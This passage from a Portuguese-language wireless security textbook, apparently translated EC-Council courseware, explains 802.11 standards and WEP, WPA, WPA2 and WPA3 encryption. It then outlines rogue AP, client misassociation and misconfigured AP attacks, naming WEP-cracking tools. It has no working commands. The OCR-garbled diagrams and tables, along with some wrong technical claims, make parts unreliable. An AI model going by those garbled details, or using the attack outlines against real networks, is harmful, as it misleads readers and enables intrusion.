dispositivos 802.11b podem funcionar diretamente com um AP 802.11g.
ÿ 802.11i: O padrão IEEE 802.11i melhora a segurança da WLAN implementando novos protocolos de
criptografia, como o Temporal Key Integrity Protocol (TKIP) e o Advanced Encryption Standard (AES).

ÿ 802.11n: O IEEE 802.11n é uma revisão que aprimora o padrão 802.11g com antenas de entrada múltipla e
saída múltipla (MIMO). Funciona nas bandas de 2,4 GHz e 5 GHz. Além disso, é um padrão da indústria
IEEE para transporte de rede local sem fio Wi-Fi. Digital Audio Broadcasting (DAB) e WLAN usam OFDM.
ÿ 802.11ah: Também chamado de Wi-Fi HaLow, usa bandas de 900 MHz para redes Wi-Fi de alcance estendido
e suporta comunicação de Internet das Coisas (IoT) com taxas de dados mais altas e alcance de cobertura
mais amplo do que os padrões anteriores.
ÿ 802.11ac: fornece uma rede de alto rendimento a uma frequência de 5 GHz. É mais rápido e confiável do que
o padrão 802.11n. Além disso, envolve rede Gigabit, que fornece uma experiência instantânea de
transferência de dados.
ÿ 802.11ad: O padrão 802.11ad inclui uma nova camada física para redes 802.11 e funciona no espectro de 60
GHz. A velocidade de propagação de dados neste padrão é muito superior aos padrões que operam nas
bandas de 2,4 GHz e 5 GHz, como o 802.11n.
ÿ 802.12: A utilização de mídia é dominada por este padrão porque funciona no protocolo de prioridade de
demanda. A velocidade Ethernet com este padrão é de 100 Mbps. Além disso, é compatível com os padrões
802.3 e 802.5. Os usuários atualmente nesses padrões podem atualizar diretamente para o padrão 802.12.
ÿ 802.15: Define os padrões para uma rede de área pessoal sem fio (WPAN) e descreve as especificações para
conectividade sem fio com dispositivos fixos ou portáteis.
ÿ 802.15.1 (Bluetooth): Bluetooth é usado principalmente para troca de dados em curtas distâncias
em dispositivos fixos ou móveis. Este padrão funciona na banda de 2,4 GHz.
ÿ 802.15.4 (ZigBee): O padrão 802.15.4 possui baixa taxa de dados e complexidade. A especificação utilizada
neste padrão é o ZigBee, que transmite dados de longa distância através de uma rede mesh. A especificação
lida com aplicativos com baixa taxa de dados de 250 Kbps, mas seu uso aumenta a vida útil da bateria.
ÿ 802.15.5: Este padrão se implanta em uma topologia full-mesh ou half-mesh. Inclui

inicialização de rede, endereçamento e unicasting.
ÿ 802.16: O padrão IEEE 802.16 é um padrão de comunicação sem fio projetado para fornecer várias opções de
camada física (PHY) e MAC. Também é conhecido como WiMax. Este padrão é uma especificação para
redes de acesso metropolitano sem fio de banda larga fixa (MANs) que usam uma arquitetura ponto-a-
multiponto.

Fluxo do módulo

Terminologia

Entenda o Bluetooth
Ataques
Contramedidas
Discutir diferentes tipos de criptografia sem fio

A criptografia sem fio é um processo de proteção de uma rede sem fio contra invasores que
tentam coletar informações confidenciais violando o tráfego de RF. Esta seção fornece
informações sobre vários padrões de criptografia sem fio, como Wired Equivalent Privacy (WEP),
Wi-Fi Protected Access (WPA), WPA2 e WPA3.

Tipos de criptografia sem fio
802.11i WEP EAP
ÿ Uma emenda do IEEE que ÿ Um algoritmo de criptografia ÿ Oferece suporte a vários

especifica mecanismos de segurança para redes sem fio IEEE 802.11 métodos de autenticação, como
para redes sem fio 802.11 cartões de token,
Kerberos e certificados
SALTO WPA TKIP
ÿ Uma versão proprietária do ÿ Uma conexão sem fio avançada ÿ Um protocolo de segurança
EAP desenvolvido pela Cisco protocolo de criptografia usando TKIP e usado no WPA como substituto
MIC para fornecer criptografia e do WEP
autenticação mais fortes
Tipos de criptografia sem fio (continuação)

WPA2 Enterprise
Integra padrões EAP
com criptografia WPA2
CCMP RAIO
Um protocolo de criptografia usado em WPA2 para Autenticação e autorização centralizadas
criptografia e autenticação mais fortes Sistema de gestão
AES PEAP
Uma criptografia de chave simétrica, usada em Um protocolo que encapsula o EAP dentro de um túnel de
WPA2 como substituto do TKIP segurança da camada de transporte (TLS) criptografado e
autenticado
WPA2 WPA3
Uma atualização para WPA usando Um protocolo de segurança Wi-Fi de terceira geração
AES e CCMP para criptografia de que usa GCMP-256 para criptografia e
dados sem fio HMAC-SHA-384 para autenticação
Tipos de criptografia sem fio

Ataques em redes sem fio estão aumentando diariamente com o aumento do uso de redes sem fio.
A criptografia de informações antes de serem transmitidas em uma rede sem fio é o método mais
popular de proteção de redes sem fio contra invasores.

Existem vários tipos de algoritmos de criptografia sem fio que podem proteger uma rede sem fio.
Cada algoritmo de criptografia sem fio tem vantagens e desvantagens.
ÿ 802.11i: É uma emenda IEEE que especifica mecanismos de segurança para 802.11 wireless
redes.
ÿ WEP: WEP é um algoritmo de criptografia para redes sem fio IEEE 802.11. é um velho
padrão de segurança sem fio e pode ser quebrado facilmente.
ÿ EAP: O Extensible Authentication Protocol (EAP) oferece suporte a vários métodos de autenticação, como
cartões de token, Kerberos e certificados.
ÿ LEAP: Lightweight EAP (LEAP) é uma versão proprietária do EAP desenvolvida pela Cisco.
ÿ WPA: É um protocolo avançado de criptografia sem fio que usa TKIP e Message Integrity Check (MIC) para
fornecer criptografia e autenticação fortes. Ele usa um vetor de inicialização de 48 bits (IV), verificação de
redundância cíclica de 32 bits (CRC) e criptografia TKIP para segurança sem fio.
ÿ TKIP: É um protocolo de segurança utilizado no WPA em substituição ao WEP.
ÿ WPA2: É uma atualização para WPA usando AES e o Protocolo de Código de Autenticação de Mensagem em
Cadeia de Bloco de Cifra de Modo Contador (CCMP) para criptografia de dados sem fio.
ÿ AES: É uma criptografia de chave simétrica usada no WPA2 em substituição ao TKIP.
ÿ CCMP: É um protocolo de criptografia usado no WPA2 para criptografia forte e

autenticação.
ÿ WPA2 Enterprise: Integra padrões EAP com criptografia WPA2.
ÿ RADIUS: É um sistema centralizado de gerenciamento de autenticação e autorização.
ÿ PEAP: É um protocolo que encapsula o EAP dentro de um túnel TLS (Transport Layer Security) criptografado e
autenticado.
ÿ WPA3: É um protocolo de segurança Wi-Fi de terceira geração que oferece novos recursos para uso pessoal e
empresarial. Ele usa Galois/Counter Mode-256 (GCMP-256) para criptografia e o código de autenticação de
mensagem hash de 384 bits com o Secure Hash Algorithm (HMAC-SHA-384) para autenticação.

Criptografia Wired Equivalent Privacy (WEP)
1 2 3
WEP é um protocolo de segurança definido O WEP usa um vetor de inicialização Ele tem vulnerabilidades significativas
pelo padrão 802.11b; foi projetado para de 24 bits (IV) para formar a cifra de fluxo e falhas de design e , portanto, pode
fornecer uma LAN sem fio com um nível de RC4 pela confidencialidade e ser facilmente quebrado
segurança e privacidade comparável ao de Soma de verificação CRC-32 para
uma LAN com fio integridade de transmissões sem fio
Armazenamento de chaves WEP
(K1, K2, K3, K4) CRC-32

Dados ICV soma de verificação
RC4
Cifra --
Semente WEP
Como WEP XOR Algoritmo X
Funciona
4 Keystream 4 PAD KID texto cifrado

Chave WEP
Pacote criptografado por WEP (corpo do quadro de
Armação MAC)
Criptografia Wired Equivalent Privacy (WEP)
O WEP foi uma das primeiras tentativas de proteger as redes sem fio contra violações de segurança, mas conforme a
tecnologia melhorou, tornou-se evidente que as informações criptografadas com WEP são vulneráveis a ataques.
Discutimos o WEP em detalhes aqui.
O que é criptografia WEP?
WEP é um componente dos padrões IEEE 802.11 WLAN. Seu objetivo principal é garantir a confidencialidade dos
dados em redes sem fio em um nível equivalente ao das LANs com fio, que podem usar a segurança física para
impedir o acesso não autorizado a uma rede.
Em uma WLAN, um usuário ou invasor pode acessar a rede sem se conectar fisicamente à LAN. Portanto, o WEP
utiliza um mecanismo de criptografia na camada de enlace de dados para minimizar o acesso não autorizado à WLAN.
Isso é feito criptografando dados com o algoritmo de criptografia simétrico Rivest Cipher 4 (RC4), que é um mecanismo
criptográfico usado para se defender contra ameaças.
Papel do WEP na comunicação sem fio
ÿ WEP protege contra espionagem em comunicações sem fio.

ÿ
Ele tenta impedir o acesso não autorizado a uma rede sem fio.
ÿ
Depende de uma chave secreta compartilhada por uma estação móvel e um AP. Esta chave criptografa os
pacotes antes da transmissão. Executar uma verificação de integridade garante que os pacotes não sejam
alterados durante a transmissão. 802.11 WEP criptografa apenas os dados entre os clientes da rede.

Principais Vantagens do WEP
ÿ Confidencialidade: Previne espionagem na camada de enlace.
ÿ Controle de Acesso: Determina quem pode acessar os dados.
ÿ Integridade dos Dados: Protege a alteração dos dados por terceiros.
ÿ Eficiência
Pontos chave
O WEP foi desenvolvido sem nenhuma revisão acadêmica ou pública. Em particular, não foi revisado por criptologistas durante o
desenvolvimento. Portanto, possui vulnerabilidades significativas e falhas de design.
WEP é uma cifra de fluxo que usa RC4 para produzir um fluxo de bytes que são XORed com texto simples. O comprimento do
WEP e da chave secreta são os seguintes:
ÿ WEP de 64 bits usa uma chave de 40 bits
ÿ WEP de 128 bits usa uma chave de 104 bits
ÿ WEP de 256 bits usa chave de 232 bits
Falhas de WEP
As seguintes falhas básicas prejudicam a capacidade do WEP de proteger contra um ataque sério.
ÿ Nenhum método definido para distribuição de chave de criptografia:
o As chaves pré-compartilhadas (PSKs) são definidas uma vez na instalação e raramente (ou nunca) são alteradas.
o É fácil recuperar o número de mensagens de texto simples criptografadas com a mesma chave.
ÿ RC4 foi projetado para ser usado em um ambiente mais aleatório do que o utilizado por
WEP:
o Como o PSK raramente é alterado, a mesma chave é usada repetidamente.
o Um invasor monitora o tráfego e encontra diferentes maneiras de trabalhar com o texto simples
mensagem.
o Com conhecimento do texto cifrado e do texto sem formatação, um invasor pode calcular a chave.
ÿ Os invasores analisam o tráfego de capturas passivas de dados e quebram chaves WEP com o
ajuda de ferramentas como AirSnort e WEPCrack.
ÿ Algoritmos de agendamento de chaves também são vulneráveis a ataques.
Como funciona o WEP
ÿ A soma de verificação CRC-32 é usada para calcular um valor de verificação de integridade (ICV) de 32 bits para os dados,
que, por sua vez, é adicionado ao quadro de dados.
ÿ Um número arbitrário de 24 bits conhecido como vetor de inicialização (IV) é adicionado à chave WEP; a chave WEP e o IV
são chamados juntos de semente WEP.

ÿ A semente WEP é usada como entrada para o algoritmo RC4 para gerar um fluxo de chaves,
que é XOR bit a bit com uma combinação dos dados e ICV para produzir os dados
criptografados.
ÿ O campo IV (IV + PAD + KID) é adicionado ao texto cifrado para gerar um quadro MAC.
Figura 8.5: Fluxo operacional do WEP

Criptografia Wi-Fi Protected Access (WPA)

WPA é um protocolo de segurança definido pelos padrões 802.11i; ele usa um Protocolo de Integridade de Chave Temporal
(TKIP) que utiliza a criptografia de cifra de fluxo RC4 com chaves de 128 bits e verificação de integridade MIC de 64 bits para
fornecer criptografia e autenticação mais fortes
O WPA usa TKIP para eliminar os pontos fracos do WEP, incluindo funções de mistura por pacote, verificações de
integridade de mensagem , vetores de inicialização estendidos e mecanismos de redigitação
Dados a Transmitir
Chave de Criptografia Temporal MSDU Michael

Algoritmo MSDU + MIC
Chave
Endereço de transmissão tecla MIC
Misturando
TSC (IV + EIV)

CRC-32 Fragmentação
Como WPA Verificar
Funciona semente WEP

MPDU ICV
soma
Algoritmo XOR x
RC4
Keystream Cabeçalho Mac 4 MIÚDO 4 texto cifrado
Cifra
Pacote para transmitir
Copyright © de Copyright © de ECEC--Council Council.. Todos os direitos reservados. A reprodução é estritamente proibida. Todos os direitos reservados. A reprodução é estritamente proibida.
Criptografia Wi-Fi Protected Access (WPA)
Wi-Fi Protected Access (WPA) é um protocolo de segurança definido pelo padrão 802.11i. No passado, o principal
mecanismo de segurança usado entre APs sem fio e clientes sem fio era a criptografia WEP, que tem uma grande
desvantagem por usar uma chave de criptografia estática. Um invasor pode explorar essa fraqueza usando
ferramentas disponíveis gratuitamente na Internet. O IEEE define o WPA como “uma expansão para os protocolos
802.11 que podem permitir maior segurança”. Quase todos os fabricantes de Wi-Fi fornecem WPA.
WPA tem melhor segurança de criptografia de dados do que WEP porque as mensagens passam por um Message
Integrity Check (MIC) usando o Temporal Key Integrity Protocol (TKIP), que utiliza a criptografia de cifra de fluxo
RC4 com chaves de 128 bits e MIC de 64 bits para fornecer criptografia forte e autenticação. O WPA é um exemplo
de como o 802.11i fornece criptografia mais forte e permite autenticação de chave pré-compartilhada (PSK) ou
EAP. O WPA usa TKIP para criptografia de dados, o que elimina os pontos fracos do WEP ao incluir funções de
mistura por pacote, MICs, IVs estendidos e mecanismos de redigitação.
O WEP normalmente usa uma chave de criptografia de 40 ou 104 bits, enquanto o TKIP usa chaves de 128 bits
para cada pacote. O MIC para WPA impede que o invasor altere ou reenvie os pacotes.
ÿ TKIP: É usado em uma chave de criptografia unicast que muda a cada pacote, aumentando assim a
segurança. Essa mudança na chave para cada pacote é coordenada automaticamente entre o cliente
sem fio e o AP. O TKIP usa um algoritmo Michael Integrity Check com uma chave MIC para gerar o valor
MIC. Ele utiliza a criptografia de cifra de fluxo RC4 com chaves de 128 bits e uma verificação de integridade
MIC de 64 bits. Mitiga a vulnerabilidade aumentando o tamanho do IV e usando funções de mixagem. No
TKIP, o cliente começa com uma chave temporal (TK) de 128 bits que é então combinada com o endereço
MAC do cliente e com um IV para criar um fluxo de chaves que é usado para criptografar dados via RC4.
Ele implementa uma sequência

contador para proteger contra ataques de repetição. O TKIP aprimora o WEP adicionando um mecanismo de
rechaveamento para fornecer novas chaves de criptografia e integridade. Os TKs são alterados a cada 10.000
pacotes, o que torna as redes protegidas por TKIP mais resistentes a ataques criptanalíticos envolvendo a
reutilização de chaves.
ÿ TKs: Todos os equipamentos Wi-Fi recém implantados usam criptografia TKIP (para WPA) ou AES (para WPA2) para
garantir a segurança da WLAN. No mecanismo de criptografia WEP, o protocolo deriva as chaves de criptografia
(TKs) da chave mestra pairwise (PMK), que é criada durante a sessão de autenticação EAP, enquanto nos
mecanismos de criptografia WPA e WPA2, o protocolo obtém as chaves de criptografia durante quatro aperto de
mão. Na mensagem de sucesso do EAP, o PMK é enviado ao AP, mas não é direcionado ao cliente Wi-Fi porque
ele derivou sua própria cópia do PMK.
A figura abaixo mostra o procedimento de instalação para TKs.
Figura 8.6: Fluxo operacional de chaves temporais
o AP envia um ANonce para o cliente, que o usa para construir o transiente pairwise
tecla (PTK).
o O cliente responde com seu próprio valor Nonce (SNonce) ao AP, juntamente com um
MICROFONE.
o O AP envia a chave temporal do grupo (GTK) e um número de sequência, junto com

outro MIC, que é usado nos próximos quadros de transmissão.
o O cliente confirma que as chaves temporais estão instaladas.
Como funciona o WPA
ÿ Um TK, endereço de transmissão e contador de sequência TKIP (TSC) são usados como entrada para o RC4
algoritmo para gerar um fluxo de chaves.
o A sequência IV ou TK, endereço de transmissão ou endereço de destino MAC e TK são combinados com uma
função hash ou função de mistura para gerar uma chave de 128 bits e 104 bits.

o Essa chave é então combinada com RC4 para produzir o keystream, que deve ter o mesmo tamanho da mensagem
original.
ÿ A unidade de dados de serviço MAC (MSDU) e a verificação de integridade de mensagem (MIC) são combinadas
usando o algoritmo de Michael.
ÿ A combinação de MSDU e MIC é fragmentada para gerar os dados do protocolo MAC

unidade (MPDU).
ÿ Um ICV de 32 bits é calculado para o MPDU.
ÿ A combinação de MPDU e ICV é XOR bit a bit com o fluxo de chaves para produzir o
dados criptografados.
ÿ O IV é adicionado aos dados criptografados para gerar o quadro MAC.
Figura 8.7: Fluxo operacional do WPA

Criptografia WPA2
O WPA2 é uma atualização para o WPA e inclui suporte Como funciona o WPA2
obrigatório para o modo de contador com o protocolo de código
Endereço de destino
de autenticação de mensagens de encadeamento de blocos cifrados prioritário
Cabeçalho MAC PN Dados de texto simples
(CCMP), um modo de criptografia baseado em AES com forte Chave Temporal
segurança
Construir
Modos de operação Construir

Nonce
AAD
Nonce AES
AAD CCMP
WPA2-Pessoal WPA2-Enterprise Construir
CCMP
ÿ Ele usa uma senha de configuração ÿ Inclui EAP ou RADIUS para
cabeçalho
(chave pré-compartilhada, cliente centralizado
PSK) para proteger acessos de autenticação usando vários
rede não autorizados métodos de autenticação, como MAC CCMP criptografado criptografado
Cabeçalho Cabeçalho Dados
cartões de token e microfone
Kerberos
Quadro MAC WPA2
Copyright © de Copyright © de ECEC--Council Council.. Todos os direitos reservados. A reprodução é estritamente proibida. Todos os direitos reservados. A reprodução é estritamente proibida.
Criptografia WPA2
Wi-Fi Protected Access 2 (WPA2) é um protocolo de segurança usado para proteger redes sem fio.
O WPA2 substituiu o WPA em 2006. Ele é compatível com o padrão 802.11i e suporta muitos recursos de
segurança que o WPA não oferece. O WPA2 apresenta o uso do algoritmo de criptografia AES compatível
com FIPS 140-2 do Instituto Nacional de Padrões e Tecnologia (NIST), que é um algoritmo de criptografia
sem fio forte, e o protocolo de código de autenticação de mensagem de encadeamento de bloco de cifra de
modo contador (CCMP). Ele fornece proteção de dados mais forte e controle de acesso à rede do que o
WPA. Além disso, oferece um alto nível de segurança às conexões Wi-Fi para que apenas usuários
autorizados possam acessar a rede.
Modos de operação
O WPA2 oferece dois modos de operação:
ÿ WPA2-Pessoal: WPA2-Pessoal usa uma senha definida com antecedência, chamada de chave pré-
compartilhada (PSK), para proteger o acesso não autorizado à rede. Cada dispositivo sem fio usa
a mesma chave de 256 bits gerada a partir de uma senha para autenticar com o AP. No modo PSK,
cada dispositivo de rede sem fio criptografa o tráfego de rede usando uma chave de 128 bits
derivada de uma senha de 8 a 63 caracteres ASCII. O roteador usa a combinação de senha, SSID
de rede e TKIP para gerar uma chave de criptografia exclusiva para cada cliente sem fio. Essas
chaves de criptografia mudam continuamente.
ÿ WPA2-Enterprise: WPA2-Enterprise usa EAP ou RADIUS para autenticação de cliente centralizada

usando vários métodos de autenticação, como cartões de token, Kerberos e certificados. O WPA-
Enterprise atribui uma chave cifrada exclusiva a cada sistema e a oculta do usuário para fornecer
segurança adicional e impedir o compartilhamento de chaves. Os usuários recebem credenciais de
login por um servidor centralizado, que devem apresentar ao se conectar à rede.

Como funciona o WPA2
Durante a implementação do CCMP, dados de autenticação adicionais (AAD) são gerados usando um cabeçalho MAC e
incluídos no processo de criptografia que usa criptografia AES e CCMP.
Consequentemente, a porção não criptografada do quadro é protegida de qualquer alteração ou distorção. O protocolo usa
um número de pacote sequenciado (PN) e uma parte do cabeçalho MAC para gerar um Nonce que ele usa no processo de
criptografia. O protocolo fornece dados de texto simples e chaves temporais, AAD e Nonce são usados como entrada para
o processo de criptografia de dados que usa os algoritmos AES e CCMP.
Um PN está incluído no cabeçalho CCMP para proteção contra ataques de repetição. Os dados resultantes dos algoritmos
AES e CCMP produzem texto criptografado e um valor MIC criptografado.
Finalmente, o cabeçalho MAC montado, o cabeçalho CCMP, os dados criptografados e o MIC criptografado formam o
quadro WPA2 MAC. A figura abaixo mostra o fluxo operacional do WPA2.
Figura 8.8: Fluxo operacional do WPA2

Criptografia WPA3
O WPA3 é uma implementação avançada do WPA2
que fornece protocolos pioneiros e usa o AES
Algoritmo de criptografia GCMP 256
Modos de operação
WPA3 - Pessoal WPA3 - Empresarial
ÿ É usado principalmente para fornecer ÿ Protege dados confidenciais usando muitos

autenticação baseada em senha usando algoritmos criptográficos
o protocolo SAE, também conhecido como Dragonfly Key
ÿ Ele fornece criptografia autenticada usando
Intercâmbio GCMP-256
ÿ É resistente a ataques de dicionário off-line e ataques ÿ Usa HMAC-SHA-384 para gerar chaves
de recuperação de chaves criptográficas
ÿ Usa ECDSA-384 para troca de chaves
Criptografia WPA3
O Wi-Fi Protected Access 3 (WPA3) foi anunciado pela Wi-Fi Alliance em janeiro de 2018 como uma
implementação avançada do WPA2 que fornece protocolos pioneiros. Assim como o WPA2, o protocolo
WPA3 possui duas variantes: WPA3-Personal e WPA3-Enterprise.
O WPA3 fornece recursos de ponta para simplificar a segurança Wi-Fi e fornece os recursos necessários
para oferecer suporte a diferentes implantações de rede, desde redes corporativas até redes domésticas.
Ele também garante consistência criptográfica usando algoritmos de criptografia como AES e TKIP para se
defender contra ataques de rede. Além disso, fornece resiliência de rede por meio de quadros de
gerenciamento protegidos (PMF) que fornecem um alto nível de proteção contra espionagem e ataques
forjados. O WPA3 também não permite protocolos herdados desatualizados.
Modos de operação
O WPA3 oferece dois modos de operação:
ÿ WPA3-Personal: Este modo é usado principalmente para fornecer autenticação baseada em senha.
O WPA3 é mais rígido a ataques do que o WPA2 porque usa um protocolo moderno de
estabelecimento de chaves chamado Simultaneous Authentication of Equals (SAE), também
conhecido como Dragonfly Key Exchange, que substitui o conceito PSK usado no WPA2-Personal.
Alguns dos recursos do WPA3-Personal são descritos abaixo.
o Resistência a ataques de dicionário offline: Previne ataques de senha passiva, como

como força bruta.
o Resistência à recuperação de chave: Mesmo quando uma senha é determinada, é impossível

capturar e determinar chaves de sessão mantendo o sigilo de encaminhamento do tráfego de
rede.

o Escolha de senha natural: permite que os usuários escolham frases fracas ou populares como senhas,
que são fáceis de lembrar.
o Fácil acessibilidade: Pode fornecer maior proteção do que o WPA2 sem alterar
os métodos anteriores usados pelos usuários para se conectar a uma rede.
ÿ WPA3-Enterprise: Este modo é baseado em WPA2. Ele oferece melhor segurança do que o WPA2 em toda a
rede e protege dados confidenciais usando muitos conceitos e ferramentas criptográficas. Alguns dos
protocolos de segurança usados pelo WPA3-Enterprise são descritos abaixo.
o Criptografia autenticada: ajuda a manter a autenticidade e a confidencialidade dos dados. Para esse
propósito, o WPA3 usa o protocolo Galois/Counter Mode de 256 bits (GCMP-256).
o Derivação e validação de chave: Ajuda na geração de uma chave criptográfica a partir de uma senha ou
chave mestra. Ele usa o modo de autenticação de mensagem com hash de 384 bits (HMAC) com o
Algoritmo de hash seguro, denominado HMAC-SHA-384.
o Estabelecimento e verificação de chave: Ajuda na troca de chaves criptográficas entre duas partes. Para
esse propósito, o WPA3 usa a troca Elliptic Curve Diffie-Hellman (ECDH) e o Elliptic Curve Digital
Signature Algorithm (ECDSA) usando uma curva elíptica de 384 bits.
o Proteção de quadro e administração robusta: WPA3 usa 256-bit Broadcast/Multicast Integrity Protocol
Galois Message Authentication Code (BIP GMAC-256) para esta finalidade.
Aprimoramentos no WPA3 em relação ao WPA2
O WPA3 pode ser usado para implementar uma estratégia de segurança em camadas que pode proteger todos os
aspectos de uma rede Wi-Fi. O WPA3 possui um programa de certificação que especifica os padrões vigentes que o
produto deve suportar. O protocolo de handshake/SAE Dragonfly é obrigatório para a certificação WPA3.
As características importantes do WPA3 são as seguintes.
1. Handshake seguro: O protocolo Simultaneous Authentication of Equals (SAE), também conhecido como
handshake Dragonfly, pode ser usado para tornar uma senha resistente a ataques de dicionário e de força
bruta, impedindo a descriptografia offline dos dados.
2. Wi-Fi Easy Connect: Este recurso simplifica o processo de configuração de segurança gerenciando diferentes
conexões de interface em uma rede com uma interface usando o Wi Fi Device Provisioning Protocol (DPP).
Isso pode permitir com segurança que uma infinidade de dispositivos inteligentes em uma rede se conectem
a um dispositivo usando um código de resposta rápida (QR) ou senha. Também ajuda a configurar uma
conexão entre diferentes dispositivos IoT.
3. Criptografia não autenticada: Ele usa um novo recurso chamado Opportunistic Wireless Encryption (OWE)
que substitui a autenticação “aberta” 802.11, fornecendo melhor proteção ao usar hotspots públicos e redes
públicas.
4. Chaves de sessão maiores: O processo de segurança criptográfica do WPA3-Enterprise suporta tamanhos

de chave de 192 bits ou mais, que são difíceis de quebrar, garantindo proteção rígida.

Comparação de WEP, WPA, WPA2

e WPA3
Criptografia Atributos
Criptografia Criptografia Chave Verificação de Integridade

Tamanho IV
Algoritmo Comprimento da Chave Gerenciamento Mecanismo
WEP RC4 24 bits 40/104 bits Nenhum CRC-32
algoritmo
aperto
WPA RC4, TKIP 48 bits 128 bits de Michael e
de mão de 4 vias
CRC-32
aperto
WPA2 AES-CCMP 48 bits 128 bits CBC-MAC
de mão de 4 vias
AES-GCMP Comprimento ECDH e

WPA3 192 bits BIP-GMAC-256
256 arbitrário 1 - 2 64 ECDSA
WEP, WPA Deve ser substituído por WPA e WPA2 mais seguros
WPA2 Incorpora proteção contra ataques de falsificação e repetição
Fornece proteção de senha aprimorada e conexões IoT seguras;

WPA3
abrange técnicas de criptografia mais fortes
Comparação de WEP, WPA, WPA2 e WPA3
O WEP fornece confidencialidade de dados em redes sem fio, mas é fraco e falha em atender a qualquer
uma de suas metas de segurança. Enquanto o WPA corrige a maioria dos problemas do WEP, o WPA2
torna as redes sem fio quase tão seguras quanto as redes com fio. Como o WPA2 suporta autenticação,
somente usuários autorizados podem acessar a rede. WEP deve ser substituído por WPA ou WPA2 para
proteger uma rede Wi-Fi. Embora o WPA e o WPA2 incorporem proteções contra ataques de falsificação
e repetição, o WPA3 pode fornecer um mecanismo de proteção por senha mais aprimorado e conexões
IoT seguras; além disso, ele utiliza técnicas de criptografia mais fortes. A tabela abaixo compara WEP,
WPA, WPA2 e WPA3 em termos de algoritmo de criptografia usado, tamanho da chave de criptografia,
vetor de inicialização (IV) que produz, gerenciamento de chave e integridade de dados.
Criptografia Atributos
Criptografia Criptografia Chave Verificação de Integridade

Tamanho IV
Algoritmo Comprimento da chave Gerenciamento Mecanismo
WEP RC4 24 bits 40/104 bits Nenhum CRC-32
Algoritmo de Michael e
WPA RC4, TKIP 48 bits 128 bits aperto de mão de 4 vias
CRC-32
WPA2 AES-CCMP 48 bits 128 bits aperto de mão de 4 vias CBC-MAC
Comprimento
WPA3 AES-GCMP 256 ECDH e ECDSA de 192 bits BIP-GMAC-256
64
arbitrário 1 - 2
Tabela 8.2: Comparação de WEP, WPA, WPA2 e WPA3

Fluxo do módulo

Terminologia

Entenda o Bluetooth
Ataques
Contramedidas
Discutir técnicas de ataque específicas para redes sem fio

As seções anteriores discutiram conceitos sem fio básicos e mecanismos de segurança sem fio,
como algoritmos de criptografia que protegem as comunicações de rede sem fio. Para proteger
redes sem fio, um profissional de segurança precisa entender as várias possíveis fraquezas dos
algoritmos de criptografia, que podem atrair invasores. A rede sem fio pode estar sujeita a vários
tipos de ataques. Esta seção discute diferentes tipos de ataques sem fio e ferramentas de ataque
sem fio.

Ataque AP desonesto
1 Um AP sem fio desonesto

colocado em uma rede
2 Quando o usuário liga
o computador, o AP sem fio
3 Todo o tráfego que o usuário
entrar passará pelo AP não
802.11 pode ser usado para desonesto se oferecerá para se autorizado, permitindo assim uma
sequestrar as conexões de conectar com o NIC do usuário forma de detecção de pacotes sem
usuários de rede legítimos da rede fio
Usuário se conectando
ao acesso não autorizado
Apontar
Meu SSID é
hacker certificado.
Conecte-se a mim
Rede Wi-Fi legítima da empresa
SSID: hacker certificado
Canal Wi-Fi: 6
Atacante
Ataque AP desonesto
Os APs se conectam aos NICs do cliente autenticando com a ajuda de SSIDs. Não autorizado (ou desonesto)
Os APs podem permitir que qualquer pessoa com um dispositivo equipado com 802.11 se conecte a uma rede
corporativa. Um AP não autorizado pode permitir que um invasor acesse a rede.
Com a ajuda de ferramentas de detecção sem fio, o seguinte pode ser determinado pelos APs: endereços MAC
autorizados, nome do fornecedor e configurações de segurança. Um invasor pode criar uma lista de endereços MAC
de APs autorizados na LAN de destino e verificar esta lista com a lista de endereços MAC encontrados por sniffing.
Posteriormente, um invasor pode criar um AP não autorizado e colocá-lo próximo à rede corporativa de destino. Os
invasores usam APs invasores colocados em uma rede 802.11 para sequestrar as conexões de usuários legítimos
da rede. Quando um usuário liga um computador, o AP não autorizado se oferece para se conectar com a NIC do
usuário da rede. O invasor atrai o usuário para se conectar ao AP não autorizado enviando o SSID. Se o usuário se
conectar ao AP não autorizado com a impressão de que é um AP legítimo, todo o tráfego do usuário passará pelo AP
não autorizado, permitindo uma forma de detecção de pacotes sem fio. Os pacotes sniffed podem até conter nomes
de usuários e senhas.
Figura 8.9: Ataque AP Rogue

Associação incorreta do cliente
Manutenção
Sala de controle
Partida
Armazenar
Ar -Controlador de tráfego SSID: hacker certificado
Aqui é o O invasor configura um AP não autorizado fora do perímetro

ponto de acesso
corporativo e atrai os funcionários da organização para se conectarem
a ele
Atacante em um
Uma vez associados, os invasores podem ignorar as políticas de
Área vizinha
segurança corporativa
A associação incorreta é uma falha de segurança que pode ocorrer quando um cliente de rede se conecta a um AP
vizinho. As associações incorretas de clientes podem ocorrer por vários motivos, como clientes mal configurados,
cobertura insuficiente de Wi-Fi corporativo, falta de uma política de Wi-Fi, restrições ao uso da Internet no escritório,
conexões ad-hoc que os administradores não gerenciam regularmente e SSIDs atraentes. Eles podem ocorrer com ou
sem o conhecimento do cliente sem fio e do AP não autorizado.
Para executar um ataque de associação incorreta do cliente, um invasor configura um AP não autorizado fora do
perímetro da corporação. O invasor primeiro descobre o SSID da rede sem fio de destino. Usando um SSID falsificado,
o invasor pode enviar beacons anunciando o AP desonesto para atrair clientes para se conectar. O invasor pode usar
o AP não autorizado como um canal para contornar as políticas de segurança da empresa. Depois que um cliente se
conecta ao AP não autorizado, um invasor pode recuperar informações confidenciais, como nomes de usuário e
senhas, iniciando ataques MITM, dicionário EAP ou Metasploit para explorar a associação incorreta do cliente.

Figura 8.10: Ataque de associação incorreta do cliente

Ataque AP mal configurado
Ponto de acesso mal configurado Conectando-

se ao hacker certificado
SSID: hacker certificado
Sem senha,
Senha Wi-Fi não configurada
sorte minha!
Atacante
Transmissão do SSID Senha fraca Erro de configuração
APs são configurados para Para verificar usuários A transmissão de SSID é

transmitir SSIDs para autorizados, os administradores um erro de configuração que
usuários autorizados de rede usam incorretamente permite que intrusos roubem
os SSIDs como senhas um SSID e façam com que o
AP assuma que eles têm
permissão para se conectar
Ataque AP mal configurado
A maioria das organizações gasta uma quantidade significativa de tempo definindo e implementando políticas de
segurança Wi-Fi, mas pode ser possível para um cliente de uma rede sem fio alterar as configurações de segurança
de um ponto de acesso sem querer. Isso, por sua vez, pode levar a configurações incorretas nos APs. Um AP mal
configurado pode expor uma rede bem protegida a ataques.
É difícil detectar um AP mal configurado porque é um dispositivo autorizado e legítimo na rede. Os invasores podem
se conectar facilmente a uma rede segura por meio de APs mal configurados, que continuam a funcionar
normalmente depois que um invasor se conecta porque nenhum alerta será acionado, mesmo que o invasor use a
